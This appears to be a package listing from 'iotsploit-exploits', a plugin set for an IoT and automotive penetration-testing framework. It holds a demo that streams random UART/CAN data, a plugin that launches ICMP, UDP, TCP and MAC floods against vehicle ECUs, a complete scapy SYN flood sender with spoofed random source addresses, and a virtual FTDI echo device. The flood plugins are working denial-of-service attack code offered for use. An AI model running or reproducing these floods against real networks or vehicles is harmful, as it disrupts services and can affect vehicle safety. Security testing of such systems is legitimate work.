iotsploit-exploits 0.0.6__py3-none-any.whl

iotsploit_exploits/demo/stream_data_attack.py

@@ -0,0 +1,184 @@
+#!/usr/bin/python3
+
+import logging
+import pluggy
+from typing import Optional, Any
+import asyncio
+import random
+import time
+from iotsploit_core.core.exploit_spec import AsyncExploitResult
+from iotsploit_core.core.base_plugin import BasePlugin
+from iotsploit_core.core.stream_manager import StreamManager, StreamData, StreamType
+
+logger = logging.getLogger(__name__)
+hookimpl = pluggy.HookimplMarker("exploit_mgr")
+
+class StreamDataAttackPlugin(BasePlugin):
+    def __init__(self):
+        super().__init__({
+            'Name': 'Stream Data Attack',
+            'Description': 'A demo plugin that simulates continuous data streaming from multiple interfaces.',
+            'License': 'GPL',
+            'Author': ['iotsploit'],
+            'Parameters': {
+                'duration': {
+                    'type': 'int',
+                    'required': False,
+                    'description': 'Duration in seconds (0 for infinite)',
+                    'default': 30,
+                    'validation': {
+                        'min': 0,
+                        'max': 3600
+                    }
+                },
+                'interfaces': {
+                    'type': 'list',
+                    'required': False,
+                    'description': 'List of interfaces to simulate',
+                    'default': ['uart', 'can'],
+                    'validation': {
+                        'choices': ['uart', 'can', 'spi', 'i2c']
+                    }
+                }
+            }
+        })
+        self._stop_attack = False
+        self.stream_manager = StreamManager()
+        self.channel = "stream_attack_device"
+
+    @hookimpl
+    def initialize(self, device_plugin: Optional[Any] = None):
+        logger.debug("Initializing StreamDataAttackPlugin")
+        self._stop_attack = False
+
+    async def _generate_uart_data(self):
+        """Simulate UART data generation"""
+        while not self._stop_attack:
+            data = bytes([random.randint(0, 255) for _ in range(16)])
+            stream_data = StreamData(
+                stream_type=StreamType.UART,
+                channel=self.channel,
+                timestamp=time.time(),
+                data=data.hex(),
+                metadata={
+                    "baudrate": 115200,
+                    "port": "/dev/ttyUSB0",
+                    "parity": "none",
+                    "stopbits": 1
+                }
+            )
+            await self.stream_manager.broadcast_data(stream_data)
+            await asyncio.sleep(0.1)  # Simulate 10Hz UART data
+
+    async def _generate_can_data(self):
+        """Simulate CAN bus data generation"""
+        while not self._stop_attack:
+            can_id = random.randint(0x100, 0x7FF)
+            data = bytes([random.randint(0, 255) for _ in range(8)])
+            stream_data = StreamData(
+                stream_type=StreamType.CAN,
+                channel=self.channel,
+                timestamp=time.time(),
+                data={
+                    "can_id": hex(can_id),
+                    "data": data.hex(),
+                    "is_extended_id": False,
+                    "is_remote_frame": False,
+                    "is_error_frame": False
+                },
+                metadata={
+                    "bitrate": 500000,
+                    "channel": "can0"
+                }
+            )
+            await self.stream_manager.broadcast_data(stream_data)
+            await asyncio.sleep(0.05)  # Simulate 20Hz CAN data
+
+    @hookimpl
+    async def execute_async(self, target: Optional[Any] = None, parameters: Optional[dict] = None) -> AsyncExploitResult:
+        """Asynchronous execution method"""
+        logger.info("Executing StreamDataAttackPlugin")
+        async_result = AsyncExploitResult()
+        
+        try:
+            # Register the channel before starting data generation
+            await self.stream_manager.register_stream(self.channel)
+            
+            # Get parameters
+            duration = parameters.get('duration', 30) if parameters else 30
+            interfaces = parameters.get('interfaces', ['uart', 'can']) if parameters else ['uart', 'can']
+            
+            # Create tasks for each interface
+            tasks = []
+            if 'uart' in interfaces:
+                logger.info("Generating UART data")
+                tasks.append(self._generate_uart_data())
+            if 'can' in interfaces:
+                logger.info("Generating CAN data")
+                tasks.append(self._generate_can_data())
+
+            if not tasks:
+                raise ValueError("No valid interfaces specified")
+
+            # Start all tasks
+            async_result.update(
+                status=True,
+                progress=0,
+                message="Starting data streaming...",
+                data={"active_interfaces": interfaces}
+            )
+
+            # If duration is 0, run indefinitely
+            if duration > 0:
+                try:
+                    # Run for specified duration
+                    await asyncio.wait_for(
+                        asyncio.gather(*tasks, return_exceptions=True),
+                        timeout=duration
+                    )
+                except asyncio.TimeoutError:
+                    pass  # Expected timeout after duration
+            else:
+                # Run until stopped
+                await asyncio.gather(*tasks, return_exceptions=True)
+
+            if self._stop_attack:
+                message = "Data streaming stopped by user"
+            else:
+                message = "Data streaming completed"
+
+            async_result.update(
+                status=True,
+                progress=100,
+                message=message,
+                data={"active_interfaces": interfaces}
+            )
+            
+            return async_result
+            
+        except Exception as e:
+            logger.error(f"Error during stream data attack: {str(e)}")
+            async_result.update(
+                status=False,
+                message=f"Attack failed: {str(e)}",
+                progress=100
+            )
+            return async_result
+        finally:
+            # Unregister the channel when done
+            await self.stream_manager.unregister_stream(self.channel)
+            self._stop_attack = True
+            await self.stream_manager.stop_broadcast(self.channel)
+
+    @hookimpl
+    def stop(self):
+        """Stop the running attack"""
+        logger.info("Stopping stream data attack")
+        self._stop_attack = True
+
+    @hookimpl
+    def cleanup(self):
+        """Cleanup after attack"""
+        logger.info("Cleaning up StreamDataAttackPlugin")
+        self._stop_attack = False
+

iotsploit_exploits/flood_attack/flood_attack.py

@@ -0,0 +1,129 @@
+import logging
+import pluggy
+from typing import Optional, Any
+from iotsploit_django.tools.vehicle_utils import query_tcam_ip, query_dhu_ip, check_ecu_alive
+from iotsploit_core.core.exploit_spec import ExploitResult
+from iotsploit_django.tools.net_audit_mgr import NetAudit_Mgr
+from iotsploit_core.utils import abort, sleep, IotsErrorCode
+from iotsploit_core.core.base_plugin import BasePlugin
+
+logger = logging.getLogger(__name__)
+hookimpl = pluggy.HookimplMarker("exploit_mgr")
+
+class FloodAttackPlugin(BasePlugin):
+    def __init__(self):
+        super().__init__({
+            'Name': 'Flood Attack',
+            'Description': 'Perform ICMP/UDP/TCP/MAC flood attacks against a target ECU with safety checks.',
+            'License': 'GPL',
+            'Author': ['iotsploit'],
+            'Parameters': {
+                'attack_type': {
+                    'type': 'str',
+                    'required': True,
+                    'description': 'Flood attack type',
+                    'default': 'icmp'
+                },
+                'ecu': {
+                    'type': 'str',
+                    'required': True,
+                    'description': 'ECU name, e.g., tcam/dhu/vgm',
+                    'default': 'tcam'
+                }
+            }
+        })
+        self.net_audit_mgr = NetAudit_Mgr.Instance()
+
+    @hookimpl
+    def initialize(self, device_plugin: Optional[Any] = None):
+        logger.debug("Initializing FloodAttackPlugin")
+        # If you need to initialize anything with the device_plugin, do it here
+        pass
+
+    @hookimpl
+    def execute(self, target: Optional[Any] = None, parameters: Optional[dict] = None) -> ExploitResult:
+        # Accept both target and parameters for compatibility
+        if target is None:
+            target = {}
+        if not isinstance(target, dict):
+            return ExploitResult(False, "Invalid target. Expected a dictionary with 'attack_type' and 'ecu'.", {})
+
+        attack_type = target.get('attack_type', self.info['Parameters']['attack_type']['default'])
+        ecu = target.get('ecu', self.info['Parameters']['ecu']['default'])
+
+        logger.info(f"Executing {attack_type} flood attack on {ecu}")
+
+        try:
+            self._check_ecu_alive(ecu, "ip", attack_type)
+            
+            ecu_ip = self._get_ecu_ip(ecu)
+            if not ecu_ip:
+                return ExploitResult(False, f"Failed to get IP for {ecu}", {})
+
+            self._start_flood_attack(attack_type, ecu, ecu_ip)
+            
+            self._perform_checks(ecu, attack_type)
+
+            self._stop_flood_attack(attack_type)
+
+            self._check_ecu_alive(ecu, "ip", attack_type)
+
+            return ExploitResult(True, f"{ecu} {attack_type} flood attack successful", {"ecu": ecu, "attack_type": attack_type})
+        except Exception as e:
+            logger.error(f"Error during flood attack execution: {str(e)}")
+            return ExploitResult(False, f"Flood attack failed: {str(e)}", {})
+
+    @hookimpl
+    def cleanup(self):
+        logger.info("Cleaning up FloodAttackPlugin")
+        # Stop any ongoing attacks
+        self.net_audit_mgr.stop_icmp_flood_attack()
+        self.net_audit_mgr.stop_udp_flood_attack()
+        self.net_audit_mgr.stop_tcp_flood_attack()
+        self.net_audit_mgr.stop_mac_flood_attack()
+
+    def _check_ecu_alive(self, ecu, checktype, attack_type):
+        if not check_ecu_alive(ecu, checktype):
+            self._stop_flood_attack(attack_type)
+            abort(f"{ecu} is not alive", code=IotsErrorCode.HOST_UNREACHABLE, ecu=ecu, checktype=checktype)
+
+    def _get_ecu_ip(self, ecu):
+        if ecu == "tcam":
+            return query_tcam_ip()
+        elif ecu == "dhu":
+            return query_dhu_ip()
+        elif ecu == "vgm":
+            return "169.254.19.1"
+        return None
+
+    def _start_flood_attack(self, attack_type, ecu, ecu_ip):
+        if attack_type == "icmp":
+            self.net_audit_mgr.start_icmp_flood_attack(ecu_ip)
+        elif attack_type == "udp":
+            self.net_audit_mgr.start_udp_flood_attack(ecu_ip)
+        elif attack_type == "tcp":
+            self.net_audit_mgr.start_tcp_flood_attack(ecu_ip)
+        elif attack_type == "mac":
+            if ecu == "vgm":
+                self.net_audit_mgr.start_mac_flood_attack(ecu_ip, "eth0")
+            else:
+                self.net_audit_mgr.start_mac_flood_attack(ecu_ip)
+
+    def _perform_checks(self, ecu, attack_type):
+        for _ in range(6):  # Check every 5 seconds for 30 seconds
+            sleep(5)
+            self._check_ecu_alive(ecu, "ip", attack_type)
+
+    def _stop_flood_attack(self, attack_type):
+        if attack_type == "icmp":
+            self.net_audit_mgr.stop_icmp_flood_attack()
+        elif attack_type == "udp":
+            self.net_audit_mgr.stop_udp_flood_attack()
+        elif attack_type == "tcp":
+            self.net_audit_mgr.stop_tcp_flood_attack()
+        elif attack_type == "mac":
+            self.net_audit_mgr.stop_mac_flood_attack()
+
+def register_plugin(pm):
+    flood_attack_plugin = FloodAttackPlugin()
+    pm.register(flood_attack_plugin)

iotsploit_exploits/flood_attack/syn_flood_attack.py

@@ -0,0 +1,233 @@
+#!/usr/bin/python3
+
+import logging
+import pluggy
+from typing import Optional, Any
+from random import randint
+from iotsploit_core.core.exploit_spec import ExploitResult
+from iotsploit_django.adapters.django.target_models import TargetManager
+from iotsploit_django.tools.input_mgr import Input_Mgr
+from iotsploit_core.core.base_plugin import BasePlugin
+
+logger = logging.getLogger(__name__)
+hookimpl = pluggy.HookimplMarker("exploit_mgr")
+
+class SynFloodAttackPlugin(BasePlugin):
+    def __init__(self):
+        super().__init__({
+            'Name': 'SYN Flood Attack',
+            'Description': 'Performs a SYN flood attack on a specified target.',
+            'License': 'GPL',
+            'Author': ['iotsploit'],
+            'RequiresRoot': True,
+            'Parameters': {
+                'port': {
+                    'type': 'int',
+                    'required': True,
+                    'description': 'Target port number for the SYN flood attack',
+                    'default': 80,
+                    'validation': {
+                        'min': 1,
+                        'max': 65535
+                    }
+                },
+                'count': {
+                    'type': 'int',
+                    'required': True,
+                    'description': 'Number of SYN packets to send',
+                    'default': 1000,
+                    'validation': {
+                        'min': 1,
+                        'max': 10000
+                    }
+                }
+            }
+        })
+
+    @hookimpl
+    def initialize(self, device_plugin: Optional[Any] = None):
+        logger.debug("Initializing SynFloodAttackPlugin")
+        pass
+
+    @hookimpl
+    def execute(self, target: Optional[Any] = None, parameters: Optional[dict] = None) -> ExploitResult:
+        logger.info("Executing SynFloodAttackPlugin")
+        logger.debug(f"Execute called with target type: {type(target)}, target: {target}")
+        logger.debug(f"Execute called with parameters: {parameters}")
+        
+        try:
+            # Note: Root privileges are now handled by Django's sudo integration
+            # This plugin will be executed under sudo automatically when called from Django
+            
+            # Execute the attack
+            result = self._execute_attack(target, parameters)
+            logger.debug(f"_execute_attack returned: {result}")
+            logger.debug(f"Result type: {type(result)}, success: {getattr(result, 'success', 'N/A')}")
+            return result
+            
+        except PermissionError as e:
+            logger.error(f"Permission error during SYN flood attack: {str(e)}")
+            error_result = ExploitResult(False, f"Permission error: {str(e)}", {})
+            logger.debug(f"Returning permission error result: {error_result}")
+            return error_result
+        except Exception as e:
+            logger.error(f"Error during SYN flood attack: {str(e)}")
+            logger.exception("Full exception traceback:")
+            error_result = ExploitResult(False, f"SYN flood attack failed: {str(e)}", {})
+            logger.debug(f"Returning exception error result: {error_result}")
+            return error_result
+
+    def _execute_attack(self, target, parameters):
+        """Helper method to execute the actual attack"""
+        logger.info(f"Executing SynFloodAttackPlugin with target: {target} and parameters: {parameters}")
+        logger.debug(f"_execute_attack: target type={type(target)}, parameters type={type(parameters)}")
+        
+        # Support both sudo and non-sudo execution:
+        # 1. If target parameter is provided (sudo mode), use it
+        # 2. If no target parameter (non-sudo mode), get from TargetManager
+        current_target = target
+        if current_target is None:
+            logger.info("No target parameter provided, getting from TargetManager")
+            target_manager = TargetManager.get_instance()
+            current_target = target_manager.get_current_target()
+            logger.debug(f"Got target from TargetManager: {current_target}")
+        else:
+            logger.info("Using target parameter from sudo runner")
+            logger.debug(f"Target parameter details: {current_target}")
+        
+        logger.info(f"Using target: {current_target}")
+        if current_target is None:
+            error_result = ExploitResult(False, "No target selected. Please load a target first.", {})
+            logger.debug(f"No target available, returning: {error_result}")
+            return error_result
+
+        if parameters:
+            port = parameters.get('port', 80)
+            count = parameters.get('count', 1000)
+        else:
+            port = Input_Mgr.Instance().int_input(
+                "Enter the target port number for SYN flood attack:",
+                min_val=1,
+                max_val=65535
+            )
+            count = Input_Mgr.Instance().int_input(
+                "Enter the number of packets to send:",
+                min_val=1,
+                max_val=10000
+            )
+
+        # Extract IP address from target (handle both dict and object formats)
+        if isinstance(current_target, dict):
+            # Target from sudo runner (dictionary format)
+            target_ip = current_target.get('ip_address')
+        else:
+            # Target from TargetManager (object format)
+            target_ip = getattr(current_target, 'ip_address', None)
+        
+        if not target_ip:
+            return ExploitResult(False, "Target IP address not found", {})
+
+        attack_target = {
+            'ip': target_ip,
+            'port': port,
+            'count': count,
+            'ipv6': False
+        }
+
+        logger.debug(f"About to execute flood with attack_target: {attack_target}")
+        
+        total = self._syn_flood_v6(attack_target['ip'], attack_target['port'], attack_target['count']) if attack_target['ipv6'] else self._syn_flood(attack_target['ip'], attack_target['port'], attack_target['count'])
+        
+        logger.debug(f"Flood attack completed, total packets sent: {total}")
+        
+        success_result = ExploitResult(True, f"SYN flood attack successful. Sent {total} packets", {
+            "packets_sent": total,
+            "target_ip": attack_target['ip'],
+            "target_port": attack_target['port'],
+            "ipv6": attack_target['ipv6']
+        })
+        
+        logger.debug(f"Created success result: {success_result}")
+        logger.debug(f"Success result attributes: success={success_result.success}, message='{success_result.message}', data={success_result.data}")
+        
+        return success_result
+
+    @hookimpl
+    def cleanup(self):
+        logger.info("Cleaning up SynFloodAttackPlugin")
+        pass
+
+    def _random_ip(self):
+        return ".".join(map(str, (randint(0, 255) for _ in range(4))))
+
+    def _rand_int(self):
+        return randint(1000, 9000)
+
+    @staticmethod
+    def _load_scapy():
+        # Import scapy lazily so plugin discovery does not require raw-socket access.
+        from scapy.all import IP, TCP, IPv6, RandIP6, send
+
+        return IP, TCP, IPv6, RandIP6, send
+
+    def _syn_flood(self, dst_ip, dst_port, counter):
+        IP, TCP, _, _, send = self._load_scapy()
+        total = 0
+        logger.info("Sending IPv4 SYN packets...")
+
+        try:
+            for _ in range(counter):
+                s_port = self._rand_int()
+                s_eq = self._rand_int()
+                w_indow = self._rand_int()
+
+                ip_packet = IP(src=self._random_ip(), dst=dst_ip)
+                tcp_packet = TCP(
+                    sport=s_port,
+                    dport=int(dst_port),
+                    flags="S",
+                    seq=s_eq,
+                    window=w_indow
+                )
+
+                send(ip_packet/tcp_packet, verbose=0)
+                total += 1
+
+            logger.info(f"Total packets sent: {total}")
+            return total
+        except Exception as e:
+            logger.error(f"Error in SYN flood attack: {str(e)}")
+            raise
+
+    def _syn_flood_v6(self, dst_ip, dst_port, counter):
+        _, TCP, IPv6, RandIP6, send = self._load_scapy()
+        total = 0
+        logger.info("Sending IPv6 SYN packets...")
+
+        try:
+            for _ in range(counter):
+                s_port = self._rand_int()
+                s_eq = self._rand_int()
+                w_indow = self._rand_int()
+
+                ip_packet = IPv6(src=RandIP6(), dst=dst_ip)
+                tcp_packet = TCP(
+                    sport=s_port,
+                    dport=int(dst_port),
+                    flags="S",
+                    seq=s_eq,
+                    window=w_indow
+                )
+
+                send(ip_packet/tcp_packet, verbose=0)
+                total += 1
+
+            logger.info(f"Total packets sent: {total}")
+            return total
+        except Exception as e:
+            logger.error(f"Error in IPv6 SYN flood attack: {str(e)}")
+            raise
+
+def register_plugin(pm):
+    syn_flood_attack_plugin = SynFloodAttackPlugin()
+    pm.register(syn_flood_attack_plugin)

iotsploit_exploits/greatfet_echo.py

@@ -0,0 +1,103 @@
+#!/usr/bin/python3
+
+import threading
+import pluggy
+from typing import Optional, Any
+from iotsploit_core.core.exploit_spec import AsyncExploitResult
+from iotsploit_core.core.base_plugin import BasePlugin
+from facedancer.devices.ftdi import FTDIDevice
+from iotsploit_core.utils import iots_logger
+import asyncio
+
+hookimpl = pluggy.HookimplMarker("exploit_mgr")
+
+class FTDIEchoPlugin(BasePlugin):
+    def __init__(self):
+        super().__init__({
+            'Name': 'FTDI Echo',
+            'Description': 'Creates a virtual FTDI device that echoes back received data in uppercase.',
+            'License': 'GPL',
+            'Author': ['iotsploit'],
+            'RequiresRoot': False,
+            'Parameters': {
+                'message': {
+                    'type': 'str',
+                    'required': False,
+                    'description': 'Custom welcome message to display',
+                    'default': 'Hello! Welcome to the FTDI demo.\nEnter any text you\'d like, and we\'ll send it back in UPPERCASE.\n'
+                }
+            }
+        })
+        self.device = None
+        self.running = False
+        self.logger = iots_logger.get_logger("ftdi_echo")
+
+    @hookimpl
+    def initialize(self, device_plugin: Optional[Any] = None):
+        self.logger.info("Initializing FTDIEchoPlugin")
+
+    async def _handle_data_async(self, data):
+        """Async version of data handler."""
+        try:
+            # Convert the data to uppercase...
+            uppercase = data.decode('utf-8').upper()
+            # Convert line endings...
+            uppercase = uppercase.replace('\r', '\n')
+            # Transmit the modified data.
+            await self.device.transmit_async(uppercase)
+        except Exception as e:
+            self.logger.error(f"Error handling data: {str(e)}")
+
+    @hookimpl
+    async def execute_async(self, target: Optional[Any] = None, parameters: Optional[dict] = None) -> AsyncExploitResult:
+        self.logger.info("Executing FTDIEchoPlugin asynchronously")
+        self.device = FTDIDevice()
+        try:
+            if not self.device:
+                return AsyncExploitResult(False, "FTDI device not initialized", {})
+
+            # Get welcome message
+            welcome_msg = (parameters.get('message') 
+                           if parameters 
+                           else self.info['Parameters']['message']['default'])
+
+            # Define the coroutine that waits for host and sends welcome message.
+            async def send_hello():
+                self.logger.info("Waiting for the host to connect.")
+                await self.device.wait_for_host()
+                self.logger.info("Host connected!")
+                self.logger.info("Telling the user hello...")
+                self.device.transmit("Hello! Welcome to the FTDI demo.\n")
+                self.device.transmit("Enter any text you'd like, and we'll send it back in UPPERCASE.\n")
+
+            # Set the device data handler.
+            self.device.handle_serial_data_received = self._handle_data_async
+            self.running = True
+
+            # Start the Facedancer emulation in a new thread to avoid the event loop conflict.
+            def emulate_thread():
+                self.device.emulate(send_hello())
+
+            t = threading.Thread(target=emulate_thread, name="FTDIEmulationThread")
+            t.start()
+
+            return AsyncExploitResult(True, "FTDI echo device running successfully", {
+                "status": "running",
+                "message": "Device is waiting for data to echo"
+            })
+
+        except Exception as e:
+            self.logger.error(f"Error during FTDI echo execution: {str(e)}")
+            return AsyncExploitResult(False, f"FTDI echo failed: {str(e)}", {})
+
+    @hookimpl
+    def cleanup(self):
+        self.logger.info("Cleaning up FTDIEchoPlugin")
+        try:
+            if self.device:
+                self.running = False
+                self.device.disconnect()  # Disconnect the emulated device.
+                self.logger.info("FTDI Device disconnected")
+                self.device = None
+        except Exception as e:
+            self.logger.error(f"Error during cleanup: {str(e)}")